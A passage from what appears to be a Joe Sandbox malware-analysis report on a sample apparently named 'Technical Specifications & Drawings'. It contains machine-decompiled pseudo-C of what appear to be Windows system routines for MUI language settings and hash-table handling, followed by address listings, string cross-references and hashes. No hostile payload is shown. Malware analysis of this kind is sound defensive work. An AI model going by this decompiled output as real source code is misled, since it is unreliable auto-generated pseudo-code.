					if(E017B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E017B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L017C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E017EF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E017F1370(_t276, 0x1784e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E017EBB40(0,  &_v68, _t170);
									if(L017B43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E017EBB40(_t257,  &_v68, _t243);
								if(L017B43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E017F1370(_t278, 0x1784e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L017C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E017EF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E017F1370(_v16, 0x1784e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E017EBB40(_t262,  &_v68, _t244);
								if(L017B43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E017F1370(_t282, 0x1784e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E017EBB40(_t262,  &_v68, _t201);
							if(L017B43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L017C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E017EF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E017F1370(_t280, 0x1784e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E017EBB40(_t267,  &_v68, _t245);
							if(L017B43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E017F1370(_t284, 0x1784e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E017EBB40(_t267,  &_v68, _t224);
						if(L017B43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                  0x017b3d3c
                                                  0x017b3d42
                                                  0x017b3d44
                                                  0x017b3d46
                                                  0x017b3d49
                                                  0x017b3d4c
                                                  0x017b3d4f
                                                  0x017b3d52
                                                  0x017b3d55
                                                  0x017b3d58
                                                  0x017b3d5b
                                                  0x017b3d5f
                                                  0x017b3d61
                                                  0x017b3d66
                                                  0x01808213
                                                  0x01808218
                                                  0x017b4085
                                                  0x017b4088
                                                  0x017b408e
                                                  0x017b4094
                                                  0x017b409a
                                                  0x017b40a0
                                                  0x017b40a6
                                                  0x017b40a9
                                                  0x017b40af
                                                  0x017b40b6
                                                  0x017b40bd
                                                  0x017b40bd
                                                  0x017b3d83
                                                  0x0180821f
                                                  0x01808229
                                                  0x01808238
                                                  0x01808238
                                                  0x0180823d
                                                  0x0180823d
                                                  0x017b3da0
                                                  0x017b3daf
                                                  0x017b3db5
                                                  0x017b3dba
                                                  0x017b3dba
                                                  0x017b3dd4
                                                  0x017b3e94
                                                  0x017b3eab
                                                  0x017b3f6d
                                                  0x017b3f84
                                                  0x017b406b
                                                  0x017b406b
                                                  0x017b406e
                                                  0x017b406e
                                                  0x017b4070
                                                  0x017b4074
                                                  0x01808351
                                                  0x01808351
                                                  0x017b407a
                                                  0x017b407f
                                                  0x0180835d
                                                  0x01808370
                                                  0x01808377
                                                  0x01808379
                                                  0x0180837c
                                                  0x0180837c
                                                  0x0180835d
                                                  0x00000000
                                                  0x017b407f
                                                  0x017b3f8a
                                                  0x017b3f8d
                                                  0x017b3f90
                                                  0x017b3f95
                                                  0x0180830d
                                                  0x0180830f
                                                  0x017b3f9b
                                                  0x017b3fac
                                                  0x017b3fae
                                                  0x017b3fb1
                                                  0x017b3fb1
                                                  0x017b3fb6
                                                  0x01808317
                                                  0x0180831a
                                                  0x00000000
                                                  0x017b3fbc
                                                  0x017b3fc1
                                                  0x017b3fc9
                                                  0x017b3fd7
                                                  0x017b3fda
                                                  0x017b3fdd
                                                  0x017b4021
                                                  0x017b4021
                                                  0x017b4029
                                                  0x017b4030
                                                  0x017b4044
                                                  0x017b4046
                                                  0x017b4046
                                                  0x017b4044
                                                  0x017b4049
                                                  0x01808327
                                                  0x01808334
                                                  0x01808339
                                                  0x0180833c
                                                  0x017b404f
                                                  0x017b404f
                                                  0x017b404f
                                                  0x017b4051
                                                  0x017b4056
                                                  0x017b4063
                                                  0x017b4063
                                                  0x017b4068
                                                  0x00000000
                                                  0x017b4068
                                                  0x017b3fdf
                                                  0x017b3fe2
                                                  0x017b3fe4
                                                  0x017b3fe7
                                                  0x017b3fef
                                                  0x017b4003
                                                  0x017b4005
                                                  0x017b4005
                                                  0x017b400c
                                                  0x017b4013
                                                  0x017b4016
                                                  0x017b4017
                                                  0x017b401b
                                                  0x017b401e
                                                  0x00000000
                                                  0x017b401e
                                                  0x017b3fb6
                                                  0x017b3eb1
                                                  0x017b3eb4
                                                  0x017b3eb7
                                                  0x017b3ebc
                                                  0x018082a9
                                                  0x018082ab
                                                  0x017b3ec2
                                                  0x017b3ed3
                                                  0x017b3ed5
                                                  0x017b3ed8
                                                  0x017b3ed8
                                                  0x017b3edd
                                                  0x018082b3
                                                  0x018082b6
                                                  0x00000000
                                                  0x017b3ee3
                                                  0x017b3ee8
                                                  0x017b3eed
                                                  0x017b3ef0
                                                  0x017b3ef3
                                                  0x017b3f02
                                                  0x017b3f05
                                                  0x017b3f08
                                                  0x018082c0
                                                  0x018082c3
                                                  0x018082c5
                                                  0x018082c8
                                                  0x018082d0
                                                  0x018082e4
                                                  0x018082e6
                                                  0x018082e6
                                                  0x018082ed
                                                  0x018082f4
                                                  0x018082f7
                                                  0x018082f8
                                                  0x018082fc
                                                  0x018082ff
                                                  0x018082ff
                                                  0x017b3f0e
                                                  0x017b3f11
                                                  0x017b3f16
                                                  0x017b3f1d
                                                  0x017b3f31
                                                  0x01808307
                                                  0x01808307
                                                  0x017b3f31
                                                  0x017b3f39
                                                  0x017b3f48
                                                  0x017b3f4d
                                                  0x017b3f50
                                                  0x017b3f50
                                                  0x017b3f53
                                                  0x017b3f58
                                                  0x017b3f65
                                                  0x017b3f65
                                                  0x017b3f6a
                                                  0x00000000
                                                  0x017b3f6a
                                                  0x017b3edd
                                                  0x017b3dda
                                                  0x017b3ddd
                                                  0x017b3de0
                                                  0x017b3de5
                                                  0x01808245
                                                  0x017b3deb
                                                  0x017b3df7
                                                  0x017b3dfc
                                                  0x017b3dfe
                                                  0x017b3e01
                                                  0x017b3e01
                                                  0x017b3e06
                                                  0x0180824d
                                                  0x0180824f
                                                  0x01808254
                                                  0x00000000
                                                  0x017b3e0c
                                                  0x017b3e11
                                                  0x017b3e16
                                                  0x017b3e19
                                                  0x017b3e29
                                                  0x017b3e2c
                                                  0x017b3e2f
                                                  0x0180825c
                                                  0x0180825f
                                                  0x01808261
                                                  0x01808264
                                                  0x0180826c
                                                  0x01808280
                                                  0x01808282
                                                  0x01808282
                                                  0x01808289
                                                  0x01808290
                                                  0x01808293
                                                  0x01808294
                                                  0x01808298
                                                  0x0180829b
                                                  0x0180829b
                                                  0x017b3e35
                                                  0x017b3e38
                                                  0x017b3e3d
                                                  0x017b3e44
                                                  0x017b3e58
                                                  0x018082a3
                                                  0x018082a3
                                                  0x017b3e58
                                                  0x017b3e60
                                                  0x017b3e6f
                                                  0x017b3e74
                                                  0x017b3e77
                                                  0x017b3e77
                                                  0x017b3e7a
                                                  0x017b3e7f
                                                  0x017b3e8c
                                                  0x017b3e8c
                                                  0x017b3e91
                                                  0x00000000
                                                  0x017b3e91

                                                  Strings
                                                  • Kernel-MUI-Language-SKU, xrefs: 017B3F70
                                                  • Kernel-MUI-Language-Allowed, xrefs: 017B3DC0
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 017B3E97
                                                  • Kernel-MUI-Number-Allowed, xrefs: 017B3D8C
                                                  • WindowsExcludedProcs, xrefs: 017B3D6F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 0-258546922
                                                  • Opcode ID: d2229998ed12e387aa03605d179ac6ec319a3bd48697ec5cd0c67e83d60e1a55
                                                  • Instruction ID: 3b92f503e57748ffa12f842f2f7dcd8e3ab7dcacc42253aa20eb634e721e3525
                                                  • Opcode Fuzzy Hash: d2229998ed12e387aa03605d179ac6ec319a3bd48697ec5cd0c67e83d60e1a55
                                                  • Instruction Fuzzy Hash: 86F12772D00219EBCB12DF98C984AEEFBB9FF59750F15006AE506E7251E7749A40CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0187E824 Relevance: 6.5, APIs: 4, Instructions: 493timeCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E0187E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x189d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L017CFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E017CFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x189b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E017C2280(E017EF3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E017BFFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x189b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E017EB640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E017DF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x189b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x189b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E0187E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E0187E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E0187E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E017CFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E0187E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}






































































                                                  0x0187e833
                                                  0x0187e839
                                                  0x0187e83e
                                                  0x0187e841
                                                  0x0187e848
                                                  0x0187e84b
                                                  0x0187e851
                                                  0x0187e8b2
                                                  0x0187e8b2
                                                  0x0187e8b5
                                                  0x0187e90b
                                                  0x0187e911
                                                  0x0187e913
                                                  0x0187e913
                                                  0x0187e91a
                                                  0x0187e91d
                                                  0x0187e922
                                                  0x0187e924
                                                  0x0187e924
                                                  0x0187e924
                                                  0x0187e92f
                                                  0x0187e933
                                                  0x0187e935
                                                  0x0187e93a
                                                  0x0187e940
                                                  0x0187e948
                                                  0x0187e950
                                                  0x0187e955
                                                  0x00000000
                                                  0x00000000
                                                  0x0187e957
                                                  0x0187e95c
                                                  0x0187e9cb
                                                  0x0187e9d2
                                                  0x0187e9d4
                                                  0x0187e9f2
                                                  0x0187e9f6
                                                  0x0187ea10
                                                  0x0187ea18
                                                  0x0187ea1a
                                                  0x0187ea1f
                                                  0x0187ea2c
                                                  0x0187ea2d
                                                  0x0187ea2e
                                                  0x0187ea32
                                                  0x0187ea3d
                                                  0x0187ea42
                                                  0x0187ea45
                                                  0x0187ea51
                                                  0x0187ea60
                                                  0x0187ea65
                                                  0x0187ea68
                                                  0x0187ea6a
                                                  0x0187ea6a
                                                  0x0187ea6a
                                                  0x0187ea6f
                                                  0x0187ea76
                                                  0x0187ea7c
                                                  0x0187ea7e
                                                  0x0187ea81
                                                  0x0187ea85
                                                  0x0187ea88
                                                  0x0187ea8c
                                                  0x0187ea8f
                                                  0x0187ea93
                                                  0x0187ea98
                                                  0x00000000
                                                  0x00000000
                                                  0x0187ea9a
                                                  0x0187ea9d
                                                  0x0187eaa2
                                                  0x0187eb0e
                                                  0x0187eb15
                                                  0x0187eb17
                                                  0x0187eb33
                                                  0x0187eb36
                                                  0x0187eb39
                                                  0x0187eb3f
                                                  0x0187eb45
                                                  0x0187eb4a
                                                  0x0187eb52
                                                  0x0187ecb1
                                                  0x0187ecb9
                                                  0x0187ecbe
                                                  0x0187ecc3
                                                  0x0187ecc6
                                                  0x0187eceb
                                                  0x0187ecee
                                                  0x0187ecf9
                                                  0x0187ecfe
                                                  0x0187ed00
                                                  0x0187ed05
                                                  0x0187ed07
                                                  0x0187ed0a
                                                  0x0187ed0c
                                                  0x0187ed0e
                                                  0x0187ed12
                                                  0x0187ed19
                                                  0x0187ed1e
                                                  0x0187ed24
                                                  0x0187ed2a
                                                  0x0187ed2a
                                                  0x0187ed2c
                                                  0x0187ed3e
                                                  0x0187ed3e
                                                  0x0187eb5a
                                                  0x0187eb62
                                                  0x0187eb69
                                                  0x00000000
                                                  0x00000000
                                                  0x0187eb6f
                                                  0x0187eb75
                                                  0x0187eb79
                                                  0x0187eb79
                                                  0x0187eb88
                                                  0x0187eb8e
                                                  0x0187eb90
                                                  0x0187eb92
                                                  0x0187eb97
                                                  0x0187ed3f
                                                  0x0187ed45
                                                  0x00000000
                                                  0x00000000
                                                  0x0187ed4b
                                                  0x0187ed4e
                                                  0x00000000
                                                  0x0187eb9d
                                                  0x0187eb9d
                                                  0x0187eb9d
                                                  0x0187eba2
                                                  0x0187ebb5
                                                  0x0187ebbc
                                                  0x0187ebbe
                                                  0x0187ebbe
                                                  0x0187ebc3
                                                  0x0187ebc5
                                                  0x0187ebcb
                                                  0x0187ebd2
                                                  0x0187ebd5
                                                  0x0187ebdb
                                                  0x0187ebdf
                                                  0x0187ebe1
                                                  0x0187ebf0
                                                  0x0187ebf9
                                                  0x0187ec04
                                                  0x0187ec07
                                                  0x0187ec0a
                                                  0x0187ec82
                                                  0x0187ec85
                                                  0x0187ec8b
                                                  0x0187ec91
                                                  0x0187ec93
                                                  0x0187ec96
                                                  0x0187ec9b
                                                  0x0187eca6
                                                  0x0187ecac
                                                  0x0187ecae
                                                  0x0187ecae
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0187ec0c
                                                  0x0187ec0c
                                                  0x0187ec0c
                                                  0x0187ec0f
                                                  0x0187ec12
                                                  0x0187ec15
                                                  0x0187ec15
                                                  0x0187ec18
                                                  0x0187ec1e
                                                  0x00000000
                                                  0x00000000
                                                  0x0187ec22
                                                  0x0187ec28
                                                  0x0187ec4b
                                                  0x0187ec5b
                                                  0x0187ec5d
                                                  0x0187ec63
                                                  0x0187ec65
                                                  0x0187ec68
                                                  0x0187ec6b
                                                  0x0187ec6b
                                                  0x0187ec70
                                                  0x0187ec71
                                                  0x0187ec74
                                                  0x0187ec7d
                                                  0x00000000
                                                  0x0187ebe3
                                                  0x0187ebe3
                                                  0x0187ebe6
                                                  0x0187ebe6
                                                  0x0187ebe7
                                                  0x0187ebe9
                                                  0x0187ebec
                                                  0x00000000
                                                  0x0187ebe6
                                                  0x0187ebe1
                                                  0x0187eba4
                                                  0x0187eba9
                                                  0x0187ebb0
                                                  0x0187ebb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0187ebab
                                                  0x0187ebab
                                                  0x0187ebab
                                                  0x0187ebac
                                                  0x0187ebac
                                                  0x00000000
                                                  0x0187ebab
                                                  0x0187eb97
                                                  0x0187eb19
                                                  0x0187eb1c
                                                  0x0187eb21
                                                  0x0187eb26
                                                  0x0187eb2c
                                                  0x0187eb2c
